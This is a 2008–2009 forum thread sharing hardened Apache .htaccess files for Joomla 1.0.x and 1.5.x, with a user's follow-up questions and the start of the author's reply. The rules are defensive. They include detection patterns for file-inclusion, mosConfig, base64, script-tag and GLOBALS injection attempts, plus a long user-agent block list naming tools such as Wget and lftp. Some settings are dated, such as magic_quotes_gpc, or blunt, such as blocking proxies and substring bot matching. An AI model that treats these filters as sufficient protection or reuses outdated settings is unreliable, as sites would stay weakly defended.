Author Topic: Tip: Hardening your Joomla site by .htaccess Version 2.4 and 2.6  (Read 3921 times)
locutus
Tip: Hardening your Joomla site by .htaccess Version 2.4 and 2.6
« on: July 18, 2008, 04:06:21 PM »

I added some extra security stuff to my .htaccess to harden my Joomla install. Blocked some common bad bots, made some files invisible and some rules used by exploits. The list is quite long and could slow down your site, but I have never seen that. Please note, this is not a substitute for not upgrading core or 3rd party extensions.

Added in version 2.0 (August 2008)
  • Extended list of bad bots
  • Compressed the same list
  • Block out rules for proxy servers
  • Create a 403 document on the fly

Added in version 2.1 (September 2008)
  • Rules for masked URLs like http%3A
  • Special versions for Joomla 1.0.x and 1.5.x

Added in version 2.2 (April 2009)
  • Deny access to vital configuration files
  • Add www before the URL for Google page rank

Added in version 2.3 (September 2009)
  • Block cross site scripting
  • Added some bad bots
  • Miscellaneous tweaks

Added in version 2.4 (October 2009)
  • Compressed some code
  • Added some extra rules
  • Miscellaneous tweaks

Added in version 2.5 (November 2009)
  • Fixed major bug in the Joomla 1.5.x version. All users are urged to upgrade.
  • Enabled proxy access in the Joomla 1.5.x version by default; J! 1.5.x should be stable enough by now. Paranoid mode is still possible.

Added in version 2.6 (November 2009)
  • Fixed small bug in the Joomla 1.5.x version.

.htaccess for Joomla 1.0.x
Code:
##
# This is a heavily modified .htaccess file based on the standard Joomla htaccess.txt
# For updates please visit http://locutusweb.asw15.org
# VERSION 2.4 FOR JOOMLA 1.0.X
#
# DISCLAIMER: We are not responsible for data loss and/or damage to your website whatsoever
# @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
##

#####################################################
#  READ THIS COMPLETELY IF YOU CHOOSE TO USE THIS FILE
#
# The line just below this section: 'Options +FollowSymLinks' may cause problems
# with some server configurations.  It is required for use of mod_rewrite, but may already
# be set by your server administrator in a way that disallows changing it in
# your .htaccess file.  If using it causes your server to error out, comment it out (add # to
# beginning of line), reload your site in your browser and test your SEF URLs.  If they work,
# it has been set by your server administrator and you do not need it set here.
#
# Only use one of the two SEF sections that follow.  Lines that can be uncommented
# (and thus used) have only one #.  Lines with two #'s should not be uncommented
# In the section that you don't use, all lines should start with #
#
# For Standard SEF, use the standard SEF section.  You can comment out
# all of the RewriteCond lines and reduce your server's load if you
# don't have directories in your root named 'component' or 'content'
#
# If you are using a 3rd Party SEF or the Core SEF solution
# uncomment all of the lines in the '3rd Party or Core SEF' section
#
#####################################################

#####  SOLVING PROBLEMS WITH COMPONENT URL's that don't work #####
# SPECIAL NOTE FOR SMF USERS WHEN SMF IS INTEGRATED AND BRIDGED
# OR ANY SITUATION WHERE A COMPONENT's URL's AREN't WORKING
#
# In both the 'Standard SEF', and '3rd Party or Core SEF' sections the line:
# RewriteCond %{REQUEST_URI} ^(/component/option,com) [NC,OR] ##optional - see notes##
# May need to be uncommented.  If you are running your Joomla!/Mambo from
# a subdirectory the name of the subdirectory will need to be inserted into this
# line.  For example, if your Joomla!/Mambo is in a subdirectory called '/test/',
# change this:
# RewriteCond %{REQUEST_URI} ^(/component/option,com) [NC,OR] ##optional - see notes##
# to this:
# RewriteCond %{REQUEST_URI} ^(/test/component/option,com) [NC,OR] ##optional - see notes##
#
#####################################################

########## Begin - Disable the server signature
#
ServerSignature Off
#
########## End - Disable the server signature

##  Can be commented out if causes errors, see notes above.
Options +FollowSymLinks

#
#  mod_rewrite in use

RewriteEngine On

#  Uncomment following line if your webserver's URL
#  is not directly related to physical file paths.
#  Update Your Joomla!/MamboDirectory (just / for root)

# RewriteBase /

########## Begin - Joomla! core SEF Section
## Use this section if using ONLY Joomla! core SEF
## ALL (RewriteCond) lines in this section are only required if you actually
## have directories named 'content' or 'component' on your server
## If you do not have directories with these names, comment them out.
#
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
#RewriteCond %{REQUEST_URI} ^(/component/option,com) [NC,OR] ##optional - see notes##
RewriteCond %{REQUEST_URI} (/|\.htm|\.php|\.html|/[^.]*)$  [NC]
RewriteRule ^(content/|component/) index.php
#
########## End - Joomla! core SEF Section

########## Begin - Block TRACE, TRACK, OPTIONS and DELETE request methods
#
## "-All" would also switch off FollowSymLinks and break mod_rewrite, so only CGI execution and directory listings are disabled here
Options -ExecCGI -Indexes
RewriteCond %{REQUEST_METHOD} ^(TRACE|TRACK|OPTIONS|DELETE)
RewriteRule .* - [F]
#
########## End - Block TRACE, TRACK, OPTIONS and DELETE request methods

########## Begin - Rewrite rules to block out referrers to external scripts
#
## If the URI refers to an external script with "http:", "ftp:" or "https:" (often ":" is masked as "%3A")
RewriteCond %{QUERY_STRING} (https?|ftp)(\:|\%3A) [NC]
##The next line is needed for Joomla 1.0.x please replace example.com with your own domain. Remove the # sign after customizing
#RewriteCond %{QUERY_STRING} !return=http\%3A\%2F\%2Fwww\.example\.com(\%2F)?&? [NC]
RewriteRule \.php[45]?$ - [F]
#
########## End - Rewrite rules to block out referrers to external scripts

########## Begin - Rewrite rules to block out some common exploits
## If you experience problems on your site block out the operations listed below
## This attempts to block the most common type of exploit `attempts` to Joomla!
#
## if the URI contains a "["
RewriteCond %{QUERY_STRING} \[ [OR]
## OR if the URI contains a "]"
RewriteCond %{QUERY_STRING} \] [OR]
## Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
## Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
## Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
## Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
## Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
## Answer every blocked request with 403 Forbidden (with the F flag the index.php substitution is ignored)
RewriteRule ^(.*)$ index.php [F,L]
#
########## End - Rewrite rules to block out some common exploits

########## Begin - Rewrite rules to block out some bad bots
#
## Matched case-insensitively as a substring, so short entries such as Link, email, Ping or Proxy can also hit legitimate clients
RewriteCond %{HTTP_USER_AGENT} ADSARobot|ah-ha|almaden|aktuelles|Anarchie|amzn_assoc|ASPSeek|ASSORT|ATHENS|Atomz|attach|attache|autoemailspider|BackWeb|Bandit|BatchFTP|bdfetch|big.brother|BlackWidow|bmclient|Boston\ Project|BravoBrian\ SpiderEngine\ MarcoPolo|Bot\ mailto:craftbot@yahoo.com|Buddy|Bullseye|bumblebee|capture|CherryPicker|ChinaClaw|CICC|clipping|Collector|Copier|Crescent|Crescent\ Internet\ ToolPak|Custo|cyberalert|DA$|Deweb|diagem|Digger|Digimarc|DIIbot|DISCo|DISCo\ Pump|DISCoFinder|Download\ Demon|Download\ Wonder|Downloader|Drip|DSurf15a|DTS.Agent|EasyDL|eCatch|ecollector|efp@gmx\.net|Email\ Extractor|EirGrabber|email|EmailCollector|EmailSiphon|EmailWolf|Express\ WebPictures|ExtractorPro|EyeNetIE|FavOrg|fastlwspider|Favorites\ Sweeper|Fetch|FEZhead|FileHound|FlashGet\ WebWasher|FlickBot|fluffy|FrontPage|GalaxyBot|Generic|Getleft|GetRight|GetSmart|GetWeb!|GetWebPage|gigabaz|Girafabot|Go\!Zilla|Go!Zilla|Go-Ahead-Got-It|GornKer|gotit|Grabber|GrabNet|Grafula|Green\ Research|grub-client|Harvest|hgrepurl|hhjhj@yahoo|hloader|HMView|HomePageSearch|http\ generic|HTTrack|httpdown|httrack|ia_archiver|IBM_Planetwide|Image\ Stripper|Image\ Sucker|imagefetch|IncyWincy|Indy*Library|Indy\ Library|informant|Ingelin|InterGET|Internet\ Ninja|InternetLinkagent|Internet\ Ninja|InternetSeer\.com|Iria|Irvine|JBH*agent|JetCar|JOC|JOC\ Web\ Spider|JustView|KWebGet|Lachesis|larbin|LeechFTP|LexiBot|lftp|libwww|likse|Link|Link*Sleuth|LINKS\ ARoMATIZED|LinkWalker|LWP|lwp-trivial|Mag-Net|Magnet|Mac\ Finder|Mag-Net|Mass\ Downloader|MCspider|Memo|Microsoft.URL|MIDown\ tool|Mirror|Missigua\ Locator|Mister\ PiX|MMMtoCrawl\/UrlDispatcherLLL|^Mozilla$|Mozilla.*Indy|Mozilla.*NEWT|Mozilla*MSIECrawler|MS\ FrontPage*|MSFrontPage|MSIECrawler|MSProxy|multithreaddb|nationaldirectory|Navroad|NearSite|NetAnts|NetCarta|NetMechanic|netprospector|NetResearchServer|NetSpider|Net\ Vampire|NetZIP|NetZip\ Downloader|NetZippy|NEWT|NICErsPRO|Ninja|NPBot|Octopus|Offline\ Explorer|Offline\ Navigator|OpaL|Openfind|OpenTextSiteCrawler|OrangeBot|OrangeSpider|PageGrabber|Papa\ Foto|PackRat|pavuk|pcBrowser|PersonaPilot|Ping|PingALink|Pockey|Proxy|psbot|.*psycheclone|PSurf|puf|Pump|PushSite|QRVA|RealDownload|Reaper|Recorder|ReGet|replacer|RepoMonkey|Robozilla|Rover|RPT-HTTPClient|Rsync|Scooter|SearchExpress|searchhippo|searchterms\.it|Second\ Street\ Research|Seeker|Shai|Siphon|sitecheck|sitecheck.internetseer.com|SiteSnagger|SlySearch|SmartDownload|snagger|Snake|SpaceBison|Spegla|SpiderBot|sproose|SqWorm|Stripper|Sucker|SuperBot|SuperHTTP|Surfbot|SurfWalker|Szukacz|tAkeOut|tarspider|Teleport\ Pro|Templeton|TrueRobot|TV33_Mercator|UIowaCrawler|UtilMind|URLSpiderPro|URL_Spider_Pro|Vacuum|vagabondo|vayala|visibilitygap|VoidEYE|vspider|Web\ Downloader|w3mir|Web\ Data\ Extractor|Web\ Image\ Collector|Web\ Sucker|Wweb|WebAuto|WebBandit|web\.by\.mail|Webclipping|webcollage|webcollector|WebCopier|webcraft@bea|webdevil|webdownloader|Webdup|WebEMailExtrac|WebFetch|WebGo\ IS|WebHook|Webinator|WebLeacher|WEBMASTERS|WebMiner|WebMirror|webmole|WebReaper|WebSauger|Website|Website\ eXtractor|Website\ Quester|WebSnake|Webster|WebStripper|websucker|webvac|webwalk|webweasel|WebWhacker|WebZIP|wbdbot|Wget|Whacker|whizbang|WhosTalking|Widow|WISEbot|WWWOFFLE|x-Tractor|^Xaldon\ WebSpider|WUMPUS|Xenu|XGET|Zeus.*Webster|Zeus [NC]
RewriteRule ^.* - [F,L]
#
########## End - Rewrite rules to block out some bad bots

########## Begin - Rewrite rules to block proxy servers from site access
#
## %{HTTP:name} looks a header up by its real name, so the hyphenated spellings are used where such a
## header exists; the other names are kept from the original list and only hit a header spelled exactly so.
## Note that this also refuses visitors behind a corporate proxy or a CDN that sets X-Forwarded-For.
RewriteCond %{HTTP:Via}                 !^$ [OR]
RewriteCond %{HTTP:Forwarded}           !^$ [OR]
RewriteCond %{HTTP:USERAGENT_VIA}       !^$ [OR]
RewriteCond %{HTTP:X-Forwarded-For}     !^$ [OR]
RewriteCond %{HTTP:Proxy-Connection}    !^$ [OR]
RewriteCond %{HTTP:XPROXY_CONNECTION}   !^$ [OR]
RewriteCond %{HTTP:HTTP_PC_REMOTE_ADDR} !^$ [OR]
RewriteCond %{HTTP:Client-IP}           !^$
RewriteRule ^(.*)$ - [F]
#
########## End - Rewrite rules to block proxy servers from site access

########## Begin - Deny direct access to htaccess-, configuration and settings files
#
<FilesMatch ".htaccess|configuration.php|config.php|Settings.php|Settings_bak.php">
order allow,deny
deny from all
</FilesMatch>
#
########## End -  Deny direct access to htaccess-, configuration and settings files

########## Begin - Deny access to all CGI, Perl, Python, xml, text and php~ files
#
<FilesMatch "\.(cgi|pl|py|xml|php~|txt)">
Deny from all
</FilesMatch>
## Allow robots.txt as the one exception; to deny it as well, put a # at the start of the following 3 lines
<FilesMatch robots.txt>
Allow from all
</FilesMatch>
#
########## End - Deny access to all CGI, Perl, Python, xml, text and php~ files

########## Begin - Do not index certain files
#
IndexIgnore .htaccess */.??* *~ *# */HEADER* */README* */_vti*
#
########## End - Do not index certain files

########## Begin - On the fly custom forbidden page
#
ErrorDocument 403 "<html><head><title>Access forbidden</title></head><body><h2><tt>Sorry, it's forbidden to access the page you requested!</tt></h2></body></html>"
#
########## End - On the fly custom forbidden page

########## Begin - Redirect non-www URLs to www to improve Google Page Rank
#
## In the next lines please replace example.com with your own domain. Remove the # sign after customizing
#rewritecond %{http_host} ^example.com
#rewriteRule ^(.*) http://www.example.com/$1 [R=301,L]
#
########## End - Redirect non-www URLs to www to improve Google Page Rank

########## Begin - Personal server settings
#
php_flag magic_quotes_gpc On

.htaccess for Joomla 1.5.x
Code:
##
# This is a heavily modified .htaccess file based on the standard Joomla htaccess.txt
# For updates please visit http://locutusweb.asw15.org
# VERSION 2.6 FOR JOOMLA 1.5.X
#
# DISCLAIMER: We are not responsible for data loss and/or damage to your website whatsoever
# @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
##

#####################################################
#  READ THIS COMPLETELY IF YOU CHOOSE TO USE THIS FILE
#
# To force www. before your domain tld, please adapt the lines 74 and 75 to your needs.
#
# The line just below this section: 'Options +FollowSymLinks' may cause problems
# with some server configurations.  It is required for use of mod_rewrite, but may already
# be set by your server administrator in a way that disallows changing it in
# your .htaccess file.  If using it causes your server to error out, comment it out (add # to
# beginning of line), reload your site in your browser and test your SEF URLs.  If they work,
# it has been set by your server administrator and you do not need it set here.
#
# Only use one of the two SEF sections that follow.  Lines that can be uncommented
# (and thus used) have only one #.  Lines with two #'s should not be uncommented
# In the section that you don't use, all lines should start with #
#
# For Standard SEF, use the standard SEF section.  You can comment out
# all of the RewriteCond lines and reduce your server's load if you
# don't have directories in your root named 'component' or 'content'
#
# If you are using a 3rd Party SEF or the Core SEF solution
# uncomment all of the lines in the '3rd Party or Core SEF' section
#
#####################################################

#####  SOLVING PROBLEMS WITH COMPONENT URL's that don't work #####
# SPECIAL NOTE FOR SMF USERS WHEN SMF IS INTEGRATED AND BRIDGED
# OR ANY SITUATION WHERE A COMPONENT's URL's AREN't WORKING
#
# In both the 'Standard SEF', and '3rd Party or Core SEF' sections the line:
# RewriteCond %{REQUEST_URI} ^(/component/option,com) [NC,OR] ##optional - see notes##
# May need to be uncommented.  If you are running your Joomla!/Mambo from
# a subdirectory the name of the subdirectory will need to be inserted into this
# line.  For example, if your Joomla!/Mambo is in a subdirectory called '/test/',
# change this:
# RewriteCond %{REQUEST_URI} ^(/component/option,com) [NC,OR] ##optional - see notes##
# to this:
# RewriteCond %{REQUEST_URI} ^(/test/component/option,com) [NC,OR] ##optional - see notes##
#
#####################################################

########## Begin - Disable the server signature
#
ServerSignature Off
#
########## End - Disable the server signature

##  Can be commented out if causes errors, see notes above.
Options +FollowSymLinks

#
#  mod_rewrite in use

RewriteEngine On

#  Uncomment following line if your webserver's URL
#  is not directly related to physical file paths.
#  Update Your Joomla!/MamboDirectory (just / for root)

# RewriteBase /

########## Begin - Redirect non-www URLs to www to improve Google Page Rank
#
## In the next lines please replace example.com with your own domain. Remove the # sign after customizing
#rewritecond %{http_host} ^example.com
#rewriteRule ^(.*) http://www.example.com/$1 [R=301,L]
#
########## End - Redirect non-www URLs to www to improve Google Page Rank

########## Begin - Rewrite rules to block out referrers to external scripts
#
## If the URI refers to an external script with "http:", "ftp:" or "https:" (often ":" is masked as "%3A")
RewriteCond %{QUERY_STRING} (https?|ftp)(\:|\%3A) [NC]
RewriteRule \.php[45]?$ - [F]
#
########## End - Rewrite rules to block out referrers to external scripts

########## Begin - Rewrite rules to block out some common exploits
## If you experience problems on your site block out the operations listed below
## This attempts to block the most common type of exploit `attempts` to Joomla!
#
## if the URI contains a "["
#RewriteCond %{QUERY_STRING} \[ [OR]
## OR if the URI contains a "]"
#RewriteCond %{QUERY_STRING} \] [OR]
## Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
## Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
## Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
## Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
## Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
## Answer every blocked request with 403 Forbidden (with the F flag the index.php substitution is ignored)
RewriteRule ^(.*)$ index.php [F,L]
#
########## End - Rewrite rules to block out some common exploits

########## Begin - Rewrite rules to block out some bad bots
#
## Matched case-insensitively as a substring, so short entries such as Link, email, Ping or Proxy can also hit legitimate clients
RewriteCond %{HTTP_USER_AGENT} ADSARobot|ah-ha|almaden|aktuelles|Anarchie|amzn_assoc|ASPSeek|ASSORT|ATHENS|Atomz|attach|attache|autoemailspider|BackWeb|Bandit|BatchFTP|bdfetch|big.brother|BlackWidow|bmclient|Boston\ Project|BravoBrian\ SpiderEngine\ MarcoPolo|Bot\ mailto:craftbot@yahoo.com|Buddy|Bullseye|bumblebee|capture|CherryPicker|ChinaClaw|CICC|clipping|Collector|Copier|Crescent|Crescent\ Internet\ ToolPak|Custo|cyberalert|DA$|Deweb|diagem|Digger|Digimarc|DIIbot|DISCo|DISCo\ Pump|DISCoFinder|Download\ Demon|Download\ Wonder|Downloader|Drip|DSurf15a|DTS.Agent|EasyDL|eCatch|ecollector|efp@gmx\.net|Email\ Extractor|EirGrabber|email|EmailCollector|EmailSiphon|EmailWolf|Express\ WebPictures|ExtractorPro|EyeNetIE|FavOrg|fastlwspider|Favorites\ Sweeper|Fetch|FEZhead|FileHound|FlashGet\ WebWasher|FlickBot|fluffy|FrontPage|GalaxyBot|Generic|Getleft|GetRight|GetSmart|GetWeb!|GetWebPage|gigabaz|Girafabot|Go\!Zilla|Go!Zilla|Go-Ahead-Got-It|GornKer|gotit|Grabber|GrabNet|Grafula|Green\ Research|grub-client|Harvest|hgrepurl|hhjhj@yahoo|hloader|HMView|HomePageSearch|http\ generic|HTTrack|httpdown|httrack|ia_archiver|IBM_Planetwide|Image\ Stripper|Image\ Sucker|imagefetch|IncyWincy|Indy*Library|Indy\ Library|informant|Ingelin|InterGET|Internet\ Ninja|InternetLinkagent|Internet\ Ninja|InternetSeer\.com|Iria|Irvine|JBH*agent|JetCar|JOC|JOC\ Web\ Spider|JustView|KWebGet|Lachesis|larbin|LeechFTP|LexiBot|lftp|libwww|likse|Link|Link*Sleuth|LINKS\ ARoMATIZED|LinkWalker|LWP|lwp-trivial|Mag-Net|Magnet|Mac\ Finder|Mag-Net|Mass\ Downloader|MCspider|Memo|Microsoft.URL|MIDown\ tool|Mirror|Missigua\ Locator|Mister\ PiX|MMMtoCrawl\/UrlDispatcherLLL|^Mozilla$|Mozilla.*Indy|Mozilla.*NEWT|Mozilla*MSIECrawler|MS\ FrontPage*|MSFrontPage|MSIECrawler|MSProxy|multithreaddb|nationaldirectory|Navroad|NearSite|NetAnts|NetCarta|NetMechanic|netprospector|NetResearchServer|NetSpider|Net\ Vampire|NetZIP|NetZip\ Downloader|NetZippy|NEWT|NICErsPRO|Ninja|NPBot|Octopus|Offline\ Explorer|Offline\ Navigator|OpaL|Openfind|OpenTextSiteCrawler|OrangeBot|OrangeSpider|PageGrabber|Papa\ Foto|PackRat|pavuk|pcBrowser|PersonaPilot|Ping|PingALink|Pockey|Proxy|psbot|.*psycheclone|PSurf|puf|Pump|PushSite|QRVA|RealDownload|Reaper|Recorder|ReGet|replacer|RepoMonkey|Robozilla|Rover|RPT-HTTPClient|Rsync|Scooter|SearchExpress|searchhippo|searchterms\.it|Second\ Street\ Research|Seeker|Shai|Siphon|sitecheck|sitecheck.internetseer.com|SiteSnagger|SlySearch|SmartDownload|snagger|Snake|SpaceBison|Spegla|SpiderBot|sproose|SqWorm|Stripper|Sucker|SuperBot|SuperHTTP|Surfbot|SurfWalker|Szukacz|tAkeOut|tarspider|Teleport\ Pro|Templeton|TrueRobot|TV33_Mercator|UIowaCrawler|UtilMind|URLSpiderPro|URL_Spider_Pro|Vacuum|vagabondo|vayala|visibilitygap|VoidEYE|vspider|Web\ Downloader|w3mir|Web\ Data\ Extractor|Web\ Image\ Collector|Web\ Sucker|Wweb|WebAuto|WebBandit|web\.by\.mail|Webclipping|webcollage|webcollector|WebCopier|webcraft@bea|webdevil|webdownloader|Webdup|WebEMailExtrac|WebFetch|WebGo\ IS|WebHook|Webinator|WebLeacher|WEBMASTERS|WebMiner|WebMirror|webmole|WebReaper|WebSauger|Website|Website\ eXtractor|Website\ Quester|WebSnake|Webster|WebStripper|websucker|webvac|webwalk|webweasel|WebWhacker|WebZIP|wbdbot|Wget|Whacker|whizbang|WhosTalking|Widow|WISEbot|WWWOFFLE|x-Tractor|^Xaldon\ WebSpider|WUMPUS|Xenu|XGET|Zeus.*Webster|Zeus [NC]
RewriteRule ^.* - [F,L]
#
########## End - Rewrite rules to block out some bad bots

########## Begin - Rewrite rules to block proxy servers from site access
#
## Lots of script kiddies attack via proxies; enable next lines for paranoid mode
## %{HTTP:name} looks a header up by its real name, so the hyphenated spellings are used where such a
## header exists; the other names are kept from the original list and only hit a header spelled exactly so.
## Note that this also refuses visitors behind a corporate proxy or a CDN that sets X-Forwarded-For.
#RewriteCond %{HTTP:Via}                 !^$ [OR]
#RewriteCond %{HTTP:Forwarded}           !^$ [OR]
#RewriteCond %{HTTP:USERAGENT_VIA}       !^$ [OR]
#RewriteCond %{HTTP:X-Forwarded-For}     !^$ [OR]
#RewriteCond %{HTTP:Proxy-Connection}    !^$ [OR]
#RewriteCond %{HTTP:XPROXY_CONNECTION}   !^$ [OR]
#RewriteCond %{HTTP:HTTP_PC_REMOTE_ADDR} !^$ [OR]
#RewriteCond %{HTTP:Client-IP}           !^$
#RewriteRule ^(.*)$ - [F]
#
########## End - Rewrite rules to block proxy servers from site access

########## Begin - Deny direct access to htaccess-, configuration and settings files
#
<FilesMatch ".htaccess|configuration.php|config.php|Settings.php|Settings_bak.php">
order allow,deny
deny from all
</FilesMatch>
#
########## End -  Deny direct access to htaccess-, configuration and settings files

########## Begin - Deny access to all CGI, Perl, Python, xml, text and php~ files
#
<FilesMatch "\.(cgi|pl|py|xml|php~|txt)">
Deny from all
</FilesMatch>
## Allow robots.txt as the one exception; to deny it as well, put a # at the start of the following 3 lines
<FilesMatch robots.txt>
Allow from all
</FilesMatch>
#
########## End - Deny access to all CGI, Perl, Python, xml, text and php~ files

########## Begin - Do not index certain files
#
IndexIgnore .htaccess */.??* *~ *# */HEADER* */README* */_vti*
#
########## End - Do not index certain files

########## Begin - Block TRACE, TRACK, OPTIONS and DELETE request methods
#
## "-All" would also switch off FollowSymLinks and break mod_rewrite, so only CGI execution and directory listings are disabled here
Options -ExecCGI -Indexes
RewriteCond %{REQUEST_METHOD} ^(TRACE|TRACK|OPTIONS|DELETE)
RewriteRule .* - [F]
#
########## End - Block TRACE, TRACK, OPTIONS and DELETE request methods

########## Begin - On the fly custom forbidden page
#
ErrorDocument 403 "<html><head><title>Access forbidden</title></head><body><h2><tt>Sorry, it's forbidden to access the page you requested!</tt></h2></body></html>"
#
########## End - On the fly custom forbidden page

########## Begin - Joomla! core SEF Section
#
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_URI} !^/index.php
RewriteCond %{REQUEST_URI} (/|\.php|\.html|\.htm|\.feed|\.pdf|\.raw|/[^.]*)$  [NC]
RewriteRule (.*) index.php
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization},L]
#
########## End - Joomla! core SEF Section

########## Begin - Personal server settings
php_flag magic_quotes_gpc On
« Last Edit: November 24, 2009, 05:21:09 AM by locutus »
cantthinkofanickname
Guest
Re: Tip: Hardening your Joomla site by .htaccess Version 2.1
« Reply #1 on: September 06, 2008, 09:19:19 PM »

I don't begin to understand the .htaccess (1.0.15). My existing one is below and I am thinking of adding some of those in the post above.

1. Does it matter which order these rules appear?
2. Does my existing one do the job or should I copy in those which are missing?
3. How does one test such a file to know it works or is it just blind faith?
Thanks.
##
# @version $Id: htaccess.txt 5973 2006-12-11 01:26:33Z robs $
# @package Joomla
# @copyright Copyright (C) 2005 Open Source Matters. All rights reserved.
# @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
# Joomla! is Free Software
#######################################################
#  READ THIS COMPLETELY IF YOU CHOOSE TO USE THIS FILE
#
# The line just below this section: 'Options +FollowSymLinks' may cause problems
# with some server configurations.  It is required for use of mod_rewrite, but may already
# be set by your server administrator in a way that disallows changing it in
# your .htaccess file.  If using it causes your server to error out, comment it out (add # to
# beginning of line), reload your site in your browser and test your SEF URLs.  If they work,
# it has been set by your server administrator and you do not need it set here.
#
# Only use one of the two SEF sections that follow.  Lines that can be uncommented
# (and thus used) have only one #.  Lines with two #'s should not be uncommented
# In the section that you don't use, all lines should start with #
#
# For Standard SEF, use the standard SEF section.  You can comment out
# all of the RewriteCond lines and reduce your server's load if you
# don't have directories in your root named 'component' or 'content'
#
# If you are using a 3rd Party SEF or the Core SEF solution
# uncomment all of the lines in the '3rd Party or Core SEF' section
#
#####################################################

#####  SOLVING PROBLEMS WITH COMPONENT URL's that don't work #####
# SPECIAL NOTE FOR SMF USERS WHEN SMF IS INTEGRATED AND BRIDGED
# OR ANY SITUATION WHERE A COMPONENT's URL's AREN't WORKING
#
# In both the 'Standard SEF', and '3rd Party or Core SEF' sections the line:
# RewriteCond %{REQUEST_URI} ^(/component/option,com) [NC,OR] ##optional - see notes##
# May need to be uncommented.  If you are running your Joomla!/Mambo from
# a subdirectory the name of the subdirectory will need to be inserted into this
# line.  For example, if your Joomla!/Mambo is in a subdirectory called '/test/',
# change this:
# RewriteCond %{REQUEST_URI} ^(/component/option,com) [NC,OR] ##optional - see notes##
# to this:
# RewriteCond %{REQUEST_URI} ^(/test/component/option,com) [NC,OR] ##optional - see notes##
#
#####################################################
##following added 06/04/08 by RM
<Files .htaccess>
order allow,deny
deny from all
</Files>
##  Can be commented out if causes errors, see notes above.
Options +FollowSymLinks

#
#  mod_rewrite in use

RewriteEngine On
##following added 06/04/08 by RM
## Parentheses, not braces, form the regex group; the rule needs "-" as substitution and [F] as flag
RewriteCond %{REQUEST_METHOD} ^(TRACE|TRACK)
RewriteRule .* - [F]

#  Uncomment following line if your webserver's URL
#  is not directly related to physical file paths.
#  Update Your Joomla!/MamboDirectory (just / for root)

RewriteBase /


########## Begin - Joomla! core SEF Section
############# Use this section if using ONLY Joomla! core SEF
## ALL (RewriteCond) lines in this section are only required if you actually
## have directories named 'content' or 'component' on your server
## If you do not have directories with these names, comment them out.
#
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
#RewriteCond %{REQUEST_URI} ^(/component/option,com) [NC,OR]       ##optional - see notes##
RewriteCond %{REQUEST_URI} (/|\.htm|\.php|\.html|/[^.]*)$  [NC]
RewriteRule ^(content/|component/) index.php
#
########## End - Joomla! core SEF Section



########## Begin - 3rd Party SEF Section
############# Use this section if you are using a 3rd party (Non Joomla! core) SEF extension - e.g. OpenSEF, 404_SEF, 404SEFx, SEF Advance, etc
#
#RewriteCond %{REQUEST_URI} ^(/component/option,com) [NC,OR]       ##optional - see notes##
#RewriteCond %{REQUEST_URI} (/|\.htm|\.php|\.html|/[^.]*)$  [NC]
#RewriteCond %{REQUEST_FILENAME} !-f
#RewriteCond %{REQUEST_FILENAME} !-d
#RewriteRule (.*) index.php
#
########## End - 3rd Party SEF Section



########## Begin - Rewrite rules to block out some common exploits
## If you experience problems on your site block out the operations listed below
## This attempts to block the most common type of exploit `attempts` to Joomla!
#
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
#
#PUT following in to try from joomla post RM260308
#Block for libwww perl preventing amateur hackers
#
Options +FollowSymlinks
RewriteCond %{HTTP_USER_AGENT} libwww-perl [NC]
RewriteRule ^.*$ - [F]
#
########## End - Rewrite rules to block out some common exploits
php_value upload_max_filesize 4M
php_flag magic_quotes_gpc on
php_flag html_errors "0"
locutus
Re: Tip: Hardening your Joomla site by .htaccess Version 2.1
« Reply #2 on: September 06, 2008, 11:26:49 PM »

Quote from: cantthinkofanickname on September 06, 2008, 09:19:19 PM
I don't begin to understand the .htaccess. (1.0.15) my existing one is below and I am thinking of adding some of those in the post above.

1. Does it matter which order these rules appear?
No, as long as this is above all:

Code:
##  Can be commented out if causes errors, see notes above.
Options +FollowSymLinks

#
#  mod_rewrite in use

RewriteEngine On
##following added 06/04/08 by RM
## Parentheses, not braces, form the regex group; the rule needs "-" as substitution and [F] as flag
RewriteCond %{REQUEST_METHOD} ^(TRACE|TRACK)
RewriteRule .* - [F]

#  Uncomment following line if your webserver's URL
#  is not directly related to physical file paths.
#  Update Your Joomla!/MamboDirectory (just / for root)

RewriteBase /
Quote
